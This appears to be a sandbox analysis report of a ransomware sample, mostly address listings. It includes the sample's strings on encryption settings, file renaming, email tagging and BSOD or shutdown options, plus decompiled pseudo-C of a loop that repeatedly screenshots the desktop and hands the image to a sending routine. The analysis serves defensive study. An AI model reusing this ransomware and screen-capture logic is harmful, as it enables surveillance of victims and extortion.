                                                                    0x00e6428e
                                                                    0x00000000
                                                                    0x00e64294
                                                                    0x00e64294
                                                                    0x00e64297
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6429d
                                                                    0x00e642a2
                                                                    0x00e642ac
                                                                    0x00000000
                                                                    0x00e642ac
                                                                    0x00e6428e
                                                                    0x00e64228
                                                                    0x00e6422d
                                                                    0x00e64230
                                                                    0x00e64232
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e64234
                                                                    0x00000000
                                                                    0x00e64234
                                                                    0x00e641df
                                                                    0x00e6418a
                                                                    0x00e6418f
                                                                    0x00e64192
                                                                    0x00e64194
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e64196
                                                                    0x00000000
                                                                    0x00e64196
                                                                    0x00e63eff
                                                                    0x00e63f06
                                                                    0x00e63f0a
                                                                    0x00e63f0c
                                                                    0x00e63f22
                                                                    0x00e63f22
                                                                    0x00e63f22
                                                                    0x00e63f25
                                                                    0x00e63f2f
                                                                    0x00e63f37
                                                                    0x00e63f39
                                                                    0x00e63f3d
                                                                    0x00e63f42
                                                                    0x00e63f46
                                                                    0x00e63f48
                                                                    0x00e63f4a
                                                                    0x00e63f4a
                                                                    0x00e63f51
                                                                    0x00e63f59
                                                                    0x00e63f5e
                                                                    0x00e63f61
                                                                    0x00e63f64
                                                                    0x00e63f67
                                                                    0x00000000
                                                                    0x00e63f6d
                                                                    0x00e63f6d
                                                                    0x00e63f70
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e63f76
                                                                    0x00e63f80
                                                                    0x00e63f85
                                                                    0x00e63f8b
                                                                    0x00e63f95
                                                                    0x00e63f98
                                                                    0x00e63f9c
                                                                    0x00e63fa1
                                                                    0x00e63fa5
                                                                    0x00e63fa8
                                                                    0x00e63faa
                                                                    0x00e63fc0
                                                                    0x00e63fc0
                                                                    0x00e63fc0
                                                                    0x00e63fc3
                                                                    0x00e63fc3
                                                                    0x00e63fc6
                                                                    0x00e64039
                                                                    0x00e6404b
                                                                    0x00e6404d
                                                                    0x00e6405f
                                                                    0x00e64064
                                                                    0x00e64074
                                                                    0x00e64079
                                                                    0x00e6407c
                                                                    0x00e64087
                                                                    0x00e64091
                                                                    0x00e64094
                                                                    0x00e6409e
                                                                    0x00e640a8
                                                                    0x00e640ab
                                                                    0x00e640b2
                                                                    0x00e640b7
                                                                    0x00e640bf
                                                                    0x00e640c6
                                                                    0x00e640cd
                                                                    0x00e640d0
                                                                    0x00e640d3
                                                                    0x00e640dd
                                                                    0x00e640de
                                                                    0x00e640df
                                                                    0x00e640e8
                                                                    0x00e640ed
                                                                    0x00e640f0
                                                                    0x00e640f3
                                                                    0x00e640f7
                                                                    0x00e640f9
                                                                    0x00e640f9
                                                                    0x00e640fb
                                                                    0x00e640ff
                                                                    0x00e64104
                                                                    0x00e64107
                                                                    0x00e6410a
                                                                    0x00e64114
                                                                    0x00e64119
                                                                    0x00e6411c
                                                                    0x00e6411f
                                                                    0x00e64129
                                                                    0x00e6412e
                                                                    0x00e64138
                                                                    0x00e6413d
                                                                    0x00e64147
                                                                    0x00e6414c
                                                                    0x00e64156
                                                                    0x00000000
                                                                    0x00e64156
                                                                    0x00e63fc8
                                                                    0x00e63fd3
                                                                    0x00e63fd9
                                                                    0x00e63fe9
                                                                    0x00e63feb
                                                                    0x00e63fef
                                                                    0x00e63ff4
                                                                    0x00e63ff8
                                                                    0x00e63ffa
                                                                    0x00e63ffc
                                                                    0x00e63ffc
                                                                    0x00e64003
                                                                    0x00e6400b
                                                                    0x00e64010
                                                                    0x00e64013
                                                                    0x00e64016
                                                                    0x00000000
                                                                    0x00e6401c
                                                                    0x00e6401c
                                                                    0x00e6401f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e64025
                                                                    0x00e6402a
                                                                    0x00e64034
                                                                    0x00000000
                                                                    0x00e64034
                                                                    0x00e64016
                                                                    0x00e63fb0
                                                                    0x00e63fb5
                                                                    0x00e63fb8
                                                                    0x00e63fba
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e63fbc
                                                                    0x00000000
                                                                    0x00e63fbc
                                                                    0x00e63f67
                                                                    0x00e63f12
                                                                    0x00e63f17
                                                                    0x00e63f1a
                                                                    0x00e63f1c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e63f1e
                                                                    0x00000000
                                                                    0x00e63f1e
                                                                    0x00e63dc5
                                                                    0x00e63dd2
                                                                    0x00e63dda
                                                                    0x00e63ddc
                                                                    0x00e63de0
                                                                    0x00e63de5
                                                                    0x00e63de9
                                                                    0x00e63deb
                                                                    0x00e63ded
                                                                    0x00e63ded
                                                                    0x00e63df4
                                                                    0x00e63dfc
                                                                    0x00e63e01
                                                                    0x00e63e04
                                                                    0x00e63e07
                                                                    0x00e63e0a
                                                                    0x00000000
                                                                    0x00e63e10
                                                                    0x00e63e10
                                                                    0x00e63e13
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e63e19
                                                                    0x00e63e23
                                                                    0x00e63e32
                                                                    0x00e63e37
                                                                    0x00e63e3c
                                                                    0x00e63e49
                                                                    0x00e63e4d
                                                                    0x00e63e4f
                                                                    0x00e63e59
                                                                    0x00e63e63
                                                                    0x00e63e6d
                                                                    0x00e63e73
                                                                    0x00e63e7a
                                                                    0x00e63e7f
                                                                    0x00e63e8b
                                                                    0x00e63e96
                                                                    0x00e63e9b
                                                                    0x00e63eb0
                                                                    0x00e63eb5
                                                                    0x00e63ebf
                                                                    0x00e63ec6
                                                                    0x00e63ec8
                                                                    0x00e63ecf
                                                                    0x00e63ed4
                                                                    0x00e63ede
                                                                    0x00000000
                                                                    0x00e63ede
                                                                    0x00e63e0a
                                                                    0x00e63c8b
                                                                    0x00e63c98
                                                                    0x00e63ca0
                                                                    0x00e63ca2
                                                                    0x00e63ca6
                                                                    0x00e63cab
                                                                    0x00e63caf
                                                                    0x00e63cb1
                                                                    0x00e63cb3
                                                                    0x00e63cb3
                                                                    0x00e63cba
                                                                    0x00e63cc2
                                                                    0x00e63cc7
                                                                    0x00e63cca
                                                                    0x00e63ccd
                                                                    0x00e63cd0
                                                                    0x00000000
                                                                    0x00e63cd6
                                                                    0x00e63cd6
                                                                    0x00e63cd9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e63cdf
                                                                    0x00e63ce9
                                                                    0x00e63cf8
                                                                    0x00e63cfd
                                                                    0x00e63d02
                                                                    0x00e63d0f
                                                                    0x00e63d13
                                                                    0x00e63d15
                                                                    0x00e63d1f
                                                                    0x00e63d29
                                                                    0x00e63d33
                                                                    0x00e63d39
                                                                    0x00e63d40
                                                                    0x00e63d45
                                                                    0x00e63d51
                                                                    0x00e63d5c
                                                                    0x00e63d61
                                                                    0x00e63d76
                                                                    0x00e63d7b
                                                                    0x00e63d85
                                                                    0x00e63d8c
                                                                    0x00e63d8e
                                                                    0x00e63d95
                                                                    0x00e63d9a
                                                                    0x00e63da4
                                                                    0x00000000
                                                                    0x00e63da4
                                                                    0x00e63cd0
                                                                    0x00e63b1c
                                                                    0x00e63b24
                                                                    0x00e63b26
                                                                    0x00e63b2a
                                                                    0x00e63b2f
                                                                    0x00e63b33
                                                                    0x00e63b35
                                                                    0x00e63b37
                                                                    0x00e63b37
                                                                    0x00e63b3e
                                                                    0x00e63b46
                                                                    0x00e63b4b
                                                                    0x00e63b4e
                                                                    0x00e63b51
                                                                    0x00000000
                                                                    0x00e63b57
                                                                    0x00e63b57
                                                                    0x00e63b5a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e63b60
                                                                    0x00e63b63
                                                                    0x00e63b6d
                                                                    0x00e63b79
                                                                    0x00e63b7e
                                                                    0x00e63b88
                                                                    0x00e63b92
                                                                    0x00e63b9c
                                                                    0x00e63b9f
                                                                    0x00e63ba9
                                                                    0x00e63bad
                                                                    0x00e63bb7
                                                                    0x00e63bbd
                                                                    0x00e63bc4
                                                                    0x00e63bc9
                                                                    0x00e63bd6
                                                                    0x00e63bdb
                                                                    0x00e63bf0
                                                                    0x00e63bf5
                                                                    0x00e63bff
                                                                    0x00e63c06
                                                                    0x00e63c08
                                                                    0x00e63c0f
                                                                    0x00e63c14
                                                                    0x00e63c1e
                                                                    0x00e63c23
                                                                    0x00e63c31
                                                                    0x00e63c3a
                                                                    0x00e63c40
                                                                    0x00e63c46
                                                                    0x00000000
                                                                    0x00e63c46
                                                                    0x00e63b51
                                                                    0x00e63ab7
                                                                    0x00e63ab9
                                                                    0x00e63abc
                                                                    0x00e63abe
                                                                    0x00e63af7
                                                                    0x00e63af7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e63ac0
                                                                    0x00e63ac0
                                                                    0x00e63ac0
                                                                    0x00e63ac6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e63ac8
                                                                    0x00e63acf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e63ad1
                                                                    0x00e63ad7
                                                                    0x00e63c51
                                                                    0x00e63c53
                                                                    0x00e63c56
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e63c5c
                                                                    0x00e63c63
                                                                    0x00e63c68
                                                                    0x00000000
                                                                    0x00e63c68
                                                                    0x00e63add
                                                                    0x00e63aee
                                                                    0x00e63af0
                                                                    0x00e63af3
                                                                    0x00e63af3
                                                                    0x00000000
                                                                    0x00e63ac0
                                                                    0x00e63985
                                                                    0x00e63993
                                                                    0x00e63995
                                                                    0x00e63998
                                                                    0x00e6399a
                                                                    0x00e63a94
                                                                    0x00e63a94
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e639a0
                                                                    0x00e639a0
                                                                    0x00e639a0
                                                                    0x00e639a2
                                                                    0x00e639a7
                                                                    0x00e639b0
                                                                    0x00e639b2
                                                                    0x00e639b4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e639ba
                                                                    0x00e639bd
                                                                    0x00e639c0
                                                                    0x00e639c0
                                                                    0x00e639c3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e639c5
                                                                    0x00e639c8
                                                                    0x00e639cb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e639d1
                                                                    0x00e639d8
                                                                    0x00e639e9
                                                                    0x00000000
                                                                    0x00e639e9
                                                                    0x00e63a78
                                                                    0x00e63a87
                                                                    0x00e63a89
                                                                    0x00e63a8c
                                                                    0x00e63a8c
                                                                    0x00000000
                                                                    0x00e639a0
                                                                    0x00e63937
                                                                    0x00e63939
                                                                    0x00e6393c
                                                                    0x00e6393e
                                                                    0x00e63966
                                                                    0x00e63966
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e63940
                                                                    0x00e63940
                                                                    0x00e63940
                                                                    0x00e63946
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6395d
                                                                    0x00e6395f
                                                                    0x00e63962
                                                                    0x00e63964
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e63964
                                                                    0x00e63a38
                                                                    0x00e63a3b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e63a41
                                                                    0x00e63a48
                                                                    0x00e63a4d
                                                                    0x00e63a5b
                                                                    0x00e63a62
                                                                    0x00e63a6b
                                                                    0x00e63a71
                                                                    0x00000000
                                                                    0x00e63a71
                                                                    0x00e638cd
                                                                    0x00e638dd
                                                                    0x00e638df
                                                                    0x00e638e2
                                                                    0x00e638e4
                                                                    0x00e63914
                                                                    0x00e63914
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e638e6
                                                                    0x00e638e6
                                                                    0x00e638e6
                                                                    0x00e638ec
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e638ee
                                                                    0x00e638f4
                                                                    0x00e639f6
                                                                    0x00e639f9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e639ff
                                                                    0x00e63a06
                                                                    0x00e63a0b
                                                                    0x00e63a19
                                                                    0x00e63a20
                                                                    0x00e63a29
                                                                    0x00e63a2f
                                                                    0x00000000
                                                                    0x00e63a2f
                                                                    0x00e638fa
                                                                    0x00e638fb
                                                                    0x00e6390b
                                                                    0x00e6390d
                                                                    0x00e63910
                                                                    0x00e63910
                                                                    0x00000000
                                                                    0x00e638e6
                                                                    0x00e646ef
                                                                    0x00e646ef
                                                                    0x00e646f6
                                                                    0x00e646fe
                                                                    0x00e64701
                                                                    0x00e64704
                                                                    0x00e64704
                                                                    0x00000000
                                                                    0x00e63810
                                                                    0x00e63570
                                                                    0x00e63570
                                                                    0x00e63576
                                                                    0x00e63578
                                                                    0x00e6357b
                                                                    0x00e6357d
                                                                    0x00000000
                                                                    0x00e6357f
                                                                    0x00e6358a
                                                                    0x00e63590
                                                                    0x00e63593
                                                                    0x00e6359a
                                                                    0x00e6359f
                                                                    0x00e635a6
                                                                    0x00e635ad
                                                                    0x00e635b4
                                                                    0x00e635bb
                                                                    0x00e635bb
                                                                    0x00e635bd
                                                                    0x00e635c0
                                                                    0x00000000
                                                                    0x00e635c0
                                                                    0x00e63560
                                                                    0x00e63563
                                                                    0x00000000
                                                                    0x00e63563
                                                                    0x00e6355e
                                                                    0x00e64804
                                                                    0x00e64809
                                                                    0x00e6480f
                                                                    0x00e6481b
                                                                    0x00e64823
                                                                    0x00e64823
                                                                    0x00000000
                                                                    0x00e634d0

                                                                    APIs
                                                                    • Sleep.KERNELBASE(0001D4C0,A6ABE2D4), ref: 00E634AB
                                                                    • CreateFileW.KERNELBASE(00000000,00000003,00000001,00000000,00000003,00000080,00000000,?,0000001A,00F29230,0000001A,\tschange.txt,0000000D), ref: 00E63519
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00E63550
                                                                    • CloseHandle.KERNEL32(?), ref: 00E63563
                                                                    • Sleep.KERNELBASE(0001D4C0), ref: 00E64809
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00E64836
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileSleep$CloseConcurrency::cancel_current_taskCreateHandleSize
                                                                    • String ID: for files bigger than $\tschange.txt$bsod$buffer setted to $buffer=$cpup=abovenormal$disabled bso$emailaftername$enabled bso$fastmode=$invalid stoi argument$iop=$networkfastmode=$nobs$nosh$renameeachfile$setting cpu pririty to aboe normall$setting io priority to $skiping mode enabled 1/$skipmode=$special skiping mode for network enabled 1/$stoi argument out of range$stopandquit$threads setted to $threads=$utdo$will put your email address at the end of file name$will rename each file after encrypted $will stop encrypting and exit $wont shutdown machine after encryption
                                                                    • API String ID: 4279352611-2154632981
                                                                    • Opcode ID: a78c93c05d5f267f39e17f1875688470354920685631855c81d97a732ca9e059
                                                                    • Instruction ID: 944411a89f0b7da694ab28d85b4c1478361cb666063f15e5fc41b35c697dca7a
                                                                    • Opcode Fuzzy Hash: a78c93c05d5f267f39e17f1875688470354920685631855c81d97a732ca9e059
                                                                    • Instruction Fuzzy Hash: 79C21F71D00258DFDB24DB78DC45BEEBBB4AF15304F2052A9E419B72C2DB706A89CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 45%
                                                                    			E00E6E2D0() {
                                                                    				intOrPtr _v8;
                                                                    				struct HWND__* _v16;
                                                                    				char _v24;
                                                                    				signed int _v32;
                                                                    				struct HDC__* _v36;
                                                                    				int _v40;
                                                                    				intOrPtr _v48;
                                                                    				struct HWND__* _v52;
                                                                    				intOrPtr _v56;
                                                                    				struct HWND__* _v60;
                                                                    				struct HWND__* _v64;
                                                                    				char _v80;
                                                                    				signed int _v84;
                                                                    				struct HWND__* _v88;
                                                                    				struct HWND__* _v92;
                                                                    				struct HWND__* _v96;
                                                                    				char _v100;
                                                                    				char _v104;
                                                                    				char _v120;
                                                                    				int _v124;
                                                                    				void* _v128;
                                                                    				struct HWND__* _v132;
                                                                    				char _v133;
                                                                    				int _v140;
                                                                    				void* _v144;
                                                                    				int _v148;
                                                                    				intOrPtr _v152;
                                                                    				signed int _t101;
                                                                    				signed int _t102;
                                                                    				int _t109;
                                                                    				struct HDC__* _t111;
                                                                    				void* _t113;
                                                                    				void* _t114;
                                                                    				struct HWND__** _t119;
                                                                    				int* _t120;
                                                                    				struct HDC__** _t121;
                                                                    				intOrPtr _t122;
                                                                    				char* _t125;
                                                                    				long _t127;
                                                                    				void* _t131;
                                                                    				int _t134;
                                                                    				signed int* _t143;
                                                                    				struct HDC__* _t144;
                                                                    				void* _t145;
                                                                    				char* _t152;
                                                                    				int _t157;
                                                                    				struct HDC__* _t158;
                                                                    				struct HWND__* _t159;
                                                                    				intOrPtr _t160;
                                                                    				int _t163;
                                                                    				intOrPtr _t165;
                                                                    				intOrPtr _t166;
                                                                    				int _t168;
                                                                    				struct HWND__* _t169;
                                                                    				void* _t171;
                                                                    				void* _t175;
                                                                    				signed int _t178;
                                                                    				void* _t179;
                                                                    				char* _t181;
                                                                    
                                                                    				_t145 = _t175;
                                                                    				_t178 = (_t175 - 0x00000008 & 0xfffffff8) + 4;
                                                                    				_v8 =  *((intOrPtr*)(_t145 + 4));
                                                                    				_push(0xffffffff);
                                                                    				_push(E00EC7F88);
                                                                    				_push( *[fs:0x0]);
                                                                    				_push(_t145);
                                                                    				_t179 = _t178 - 0x80;
                                                                    				_t101 =  *0xeef074; // 0xa6abe2d4
                                                                    				_t102 = _t101 ^ _t178;
                                                                    				_v32 = _t102;
                                                                    				_push(_t102);
                                                                    				 *[fs:0x0] =  &_v24;
                                                                    				while(1) {
                                                                    					L1:
                                                                    					_v100 = 1;
                                                                    					_v96 = 0;
                                                                    					_v92 = 0;
                                                                    					_v88 = 0;
                                                                    					__imp__GdiplusStartup( &_v104,  &_v100, 0); // executed
                                                                    					_v140 = GetSystemMetrics(0x4c);
                                                                    					_t157 = GetSystemMetrics(0x4d);
                                                                    					_v148 = _t157;
                                                                    					_v124 = GetSystemMetrics(0x4e);
                                                                    					_t109 = GetSystemMetrics(0x4f);
                                                                    					_v124 = _v124 - _v140;
                                                                    					_t163 = _t109 - _t157;
                                                                    					_v40 = _t163;
                                                                    					_t111 = GetDC(0);
                                                                    					_v36 = _t111;
                                                                    					_t158 = CreateCompatibleDC(_t111);
                                                                    					_t113 = CreateCompatibleBitmap(_v36, _v124, _t163);
                                                                    					_v144 = _t113;
                                                                    					_t114 = SelectObject(_t158, _t113);
                                                                    					BitBlt(_t158, 0, 0, _v124, _v40, _v36, _v140, _v148, 0xcc0020);
                                                                    					SelectObject(_t158, _t114);
                                                                    					DeleteDC(_t158);
                                                                    					ReleaseDC(0, _v36);
                                                                    					asm("xorps xmm0, xmm0");
                                                                    					asm("movups [ebp-0x2c], xmm0");
                                                                    					_v56 = 0xed9b8c;
                                                                    					_v16 = 0;
                                                                    					_t119 =  &_v132;
                                                                    					_v56 = 0xed9b98;
                                                                    					_v132 = 0;
                                                                    					__imp__GdipCreateBitmapFromHBITMAP(_v144, 0, _t119); // executed
                                                                    					_t165 = _t119;
                                                                    					_v48 = _t165;
                                                                    					_t159 = _v132;
                                                                    					_v140 = _t159;
                                                                    					_v52 = _t159;
                                                                    					_v16 = 1;
                                                                    					_v133 = 1;
                                                                    					_v40 = 0;
                                                                    					_t120 =  &_v40;
                                                                    					__imp__GdipGetImageHeight(_t159, _t120);
                                                                    					_t166 =  !=  ? _t120 : _t165;
                                                                    					_t121 =  &_v36;
                                                                    					_v48 = _t166;
                                                                    					_v36 = 0;
                                                                    					__imp__GdipGetImageWidth(_t159, _t121);
                                                                    					_t167 =  !=  ? _t121 : _t166;
                                                                    					_t160 = 0;
                                                                    					_v48 =  !=  ? _t121 : _t166;
                                                                    					if(_v36 <= 0) {
                                                                    						goto L9;
                                                                    					}
                                                                    					L2:
                                                                    					do {
                                                                    						_t171 = 0;
                                                                    						do {
                                                                    							_t143 =  &_v84;
                                                                    							__imp__GdipBitmapGetPixel(_v140, _t171, _t160, _t143);
                                                                    							if(_t143 == 0) {
                                                                    								if((_v84 & 0x00ffffff) != 0) {
                                                                    									_t122 = 0;
                                                                    									L10:
                                                                    									if(_t122 != 0) {
                                                                    										L18:
                                                                    										Sleep(0x1b7740); // executed
                                                                    										_v16 = 0xffffffff;
                                                                    										_v56 = 0xed9b8c;
                                                                    										__imp__GdipDisposeImage(_v140); // executed
                                                                    										while(1) {
                                                                    											L1:
                                                                    											_v100 = 1;
                                                                    											_v96 = 0;
                                                                    											_v92 = 0;
                                                                    											_v88 = 0;
                                                                    											__imp__GdiplusStartup( &_v104,  &_v100, 0); // executed
                                                                    											_v140 = GetSystemMetrics(0x4c);
                                                                    											_t157 = GetSystemMetrics(0x4d);
                                                                    											_v148 = _t157;
                                                                    											_v124 = GetSystemMetrics(0x4e);
                                                                    											_t109 = GetSystemMetrics(0x4f);
                                                                    											_v124 = _v124 - _v140;
                                                                    											_t163 = _t109 - _t157;
                                                                    											_v40 = _t163;
                                                                    											_t111 = GetDC(0);
                                                                    											_v36 = _t111;
                                                                    											_t158 = CreateCompatibleDC(_t111);
                                                                    											_t113 = CreateCompatibleBitmap(_v36, _v124, _t163);
                                                                    											_v144 = _t113;
                                                                    											_t114 = SelectObject(_t158, _t113);
                                                                    											BitBlt(_t158, 0, 0, _v124, _v40, _v36, _v140, _v148, 0xcc0020);
                                                                    											SelectObject(_t158, _t114);
                                                                    											DeleteDC(_t158);
                                                                    											ReleaseDC(0, _v36);
                                                                    											asm("xorps xmm0, xmm0");
                                                                    											asm("movups [ebp-0x2c], xmm0");
                                                                    											_v56 = 0xed9b8c;
                                                                    											_v16 = 0;
                                                                    											_t119 =  &_v132;
                                                                    											_v56 = 0xed9b98;
                                                                    											_v132 = 0;
                                                                    											__imp__GdipCreateBitmapFromHBITMAP(_v144, 0, _t119); // executed
                                                                    											_t165 = _t119;
                                                                    											_v48 = _t165;
                                                                    											_t159 = _v132;
                                                                    											_v140 = _t159;
                                                                    											_v52 = _t159;
                                                                    											_v16 = 1;
                                                                    											_v133 = 1;
                                                                    											_v40 = 0;
                                                                    											_t120 =  &_v40;
                                                                    											__imp__GdipGetImageHeight(_t159, _t120);
                                                                    											_t166 =  !=  ? _t120 : _t165;
                                                                    											_t121 =  &_v36;
                                                                    											_v48 = _t166;
                                                                    											_v36 = 0;
                                                                    											__imp__GdipGetImageWidth(_t159, _t121);
                                                                    											_t167 =  !=  ? _t121 : _t166;
                                                                    											_t160 = 0;
                                                                    											_v48 =  !=  ? _t121 : _t166;
                                                                    											if(_v36 <= 0) {
                                                                    												goto L9;
                                                                    											}
                                                                    											goto L2;
                                                                    										}
                                                                    									}
                                                                    									_v124 = 0;
                                                                    									__imp__CreateStreamOnHGlobal(0, 1,  &_v124); // executed
                                                                    									__imp__CLSIDFromString(L"{557cf401-1a04-11d3-9a73-0000f81ef32e}",  &_v120);
                                                                    									_t168 = _v140;
                                                                    									_t125 =  &_v120;
                                                                    									__imp__GdipSaveImageToStream(_t168, _v124, _t125, 0); // executed
                                                                    									if(_t125 == 0) {
                                                                    										_v128 = 0;
                                                                    										__imp__GetHGlobalFromStream(_v124,  &_v128);
                                                                    										_t127 = GlobalSize(_v128);
                                                                    										_v64 = 0;
                                                                    										_t169 = _t127;
                                                                    										_v60 = 0;
                                                                    										_v64 = 0;
                                                                    										_v60 = 0xf;
                                                                    										_v80 = 0;
                                                                    										_v16 = 3;
                                                                    										_t146 = _v64;
                                                                    										if(_t169 > _v64) {
                                                                    											_push(0);
                                                                    											E00E73160(_t145,  &_v80, _t160, _t169 - _t146); // executed
                                                                    										} else {
                                                                    											_v64 = _t169;
                                                                    											_t142 =  >=  ? _v80 :  &_v80;
                                                                    											 *((char*)(( >=  ? _v80 :  &_v80) + _t169)) = 0;
                                                                    										}
                                                                    										_t131 = GlobalLock(_v128);
                                                                    										_t149 =  >=  ? _v80 :  &_v80;
                                                                    										E00EA90F0( >=  ? _v80 :  &_v80, _t131, _t169);
                                                                    										GlobalUnlock(_v128);
                                                                    										_t134 = _v124;
                                                                    										 *0xecd328(_t134); // executed
                                                                    										 *((intOrPtr*)( *((intOrPtr*)( *_t134 + 8))))(); // executed
                                                                    										DeleteObject(_v144);
                                                                    										_t181 = _t179 + 0xc - 0x18;
                                                                    										_t152 = _t181;
                                                                    										_v152 = _t181;
                                                                    										_push(4);
                                                                    										 *(_t152 + 0x10) = 0;
                                                                    										 *(_t152 + 0x14) = 0xf;
                                                                    										 *_t152 = 0;
                                                                    										L00E83CB0(_t145, _t152, "sbyc");
                                                                    										_v16 = 4;
                                                                    										_v16 = 3;
                                                                    										E00E6DE30(_t145,  &_v80, 0x70, _t160,  *((intOrPtr*)( *_t134 + 8))); // executed
                                                                    										_t179 = _t181 + 0x18;
                                                                    										_v16 = 1;
                                                                    										L00E83B80(_t145,  &_v80, _t160); // executed
                                                                    										goto L18;
                                                                    									}
                                                                    									_v48 = _t125;
                                                                    									_v16 = 0xffffffff;
                                                                    									_v56 = 0xed9b8c;
                                                                    									__imp__GdipDisposeImage(_t168);
                                                                    									goto L1;
                                                                    								}
                                                                    								goto L7;
                                                                    							}
                                                                    							_v48 = _t143;
                                                                    							L7:
                                                                    							_t144 = _v36;
                                                                    							_t171 = _t171 + 1;
                                                                    						} while (_t171 < _t144);
                                                                    						_t160 = _t160 + 1;
                                                                    					} while (_t160 < _t144);
                                                                    					L9:
                                                                    					_t122 = _v133;
                                                                    					goto L10;
                                                                    				}
                                                                    			}






























































                                                                    0x00e6e2d1
                                                                    0x00e6e2d9
                                                                    0x00e6e2e0
                                                                    0x00e6e2e6
                                                                    0x00e6e2e8
                                                                    0x00e6e2f3
                                                                    0x00e6e2f4
                                                                    0x00e6e2f5
                                                                    0x00e6e2fb
                                                                    0x00e6e300
                                                                    0x00e6e302
                                                                    0x00e6e307
                                                                    0x00e6e30b
                                                                    0x00e6e311
                                                                    0x00e6e311
                                                                    0x00e6e316
                                                                    0x00e6e321
                                                                    0x00e6e329
                                                                    0x00e6e330
                                                                    0x00e6e337
                                                                    0x00e6e347
                                                                    0x00e6e350
                                                                    0x00e6e354
                                                                    0x00e6e362
                                                                    0x00e6e365
                                                                    0x00e6e370
                                                                    0x00e6e373
                                                                    0x00e6e377
                                                                    0x00e6e37a
                                                                    0x00e6e381
                                                                    0x00e6e38e
                                                                    0x00e6e393
                                                                    0x00e6e39b
                                                                    0x00e6e3a1
                                                                    0x00e6e3c5
                                                                    0x00e6e3cd
                                                                    0x00e6e3d4
                                                                    0x00e6e3df
                                                                    0x00e6e3e5
                                                                    0x00e6e3e8
                                                                    0x00e6e3ec
                                                                    0x00e6e3f3
                                                                    0x00e6e3fa
                                                                    0x00e6e406
                                                                    0x00e6e40d
                                                                    0x00e6e414
                                                                    0x00e6e41a
                                                                    0x00e6e41c
                                                                    0x00e6e41f
                                                                    0x00e6e422
                                                                    0x00e6e425
                                                                    0x00e6e428
                                                                    0x00e6e42f
                                                                    0x00e6e433
                                                                    0x00e6e43a
                                                                    0x00e6e43f
                                                                    0x00e6e447
                                                                    0x00e6e44a
                                                                    0x00e6e44e
                                                                    0x00e6e452
                                                                    0x00e6e459
                                                                    0x00e6e461
                                                                    0x00e6e464
                                                                    0x00e6e466
                                                                    0x00e6e46c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6e470
                                                                    0x00e6e470
                                                                    0x00e6e472
                                                                    0x00e6e472
                                                                    0x00e6e47b
                                                                    0x00e6e483
                                                                    0x00e6e491
                                                                    0x00e6e503
                                                                    0x00e6e4a3
                                                                    0x00e6e4a5
                                                                    0x00e6e604
                                                                    0x00e6e609
                                                                    0x00e6e60f
                                                                    0x00e6e619
                                                                    0x00e6e620
                                                                    0x00e6e311
                                                                    0x00e6e311
                                                                    0x00e6e316
                                                                    0x00e6e321
                                                                    0x00e6e329
                                                                    0x00e6e330
                                                                    0x00e6e337
                                                                    0x00e6e347
                                                                    0x00e6e350
                                                                    0x00e6e354
                                                                    0x00e6e362
                                                                    0x00e6e365
                                                                    0x00e6e370
                                                                    0x00e6e373
                                                                    0x00e6e377
                                                                    0x00e6e37a
                                                                    0x00e6e381
                                                                    0x00e6e38e
                                                                    0x00e6e393
                                                                    0x00e6e39b
                                                                    0x00e6e3a1
                                                                    0x00e6e3c5
                                                                    0x00e6e3cd
                                                                    0x00e6e3d4
                                                                    0x00e6e3df
                                                                    0x00e6e3e5
                                                                    0x00e6e3e8
                                                                    0x00e6e3ec
                                                                    0x00e6e3f3
                                                                    0x00e6e3fa
                                                                    0x00e6e406
                                                                    0x00e6e40d
                                                                    0x00e6e414
                                                                    0x00e6e41a
                                                                    0x00e6e41c
                                                                    0x00e6e41f
                                                                    0x00e6e422
                                                                    0x00e6e425
                                                                    0x00e6e428
                                                                    0x00e6e42f
                                                                    0x00e6e433
                                                                    0x00e6e43a
                                                                    0x00e6e43f
                                                                    0x00e6e447
                                                                    0x00e6e44a
                                                                    0x00e6e44e
                                                                    0x00e6e452
                                                                    0x00e6e459
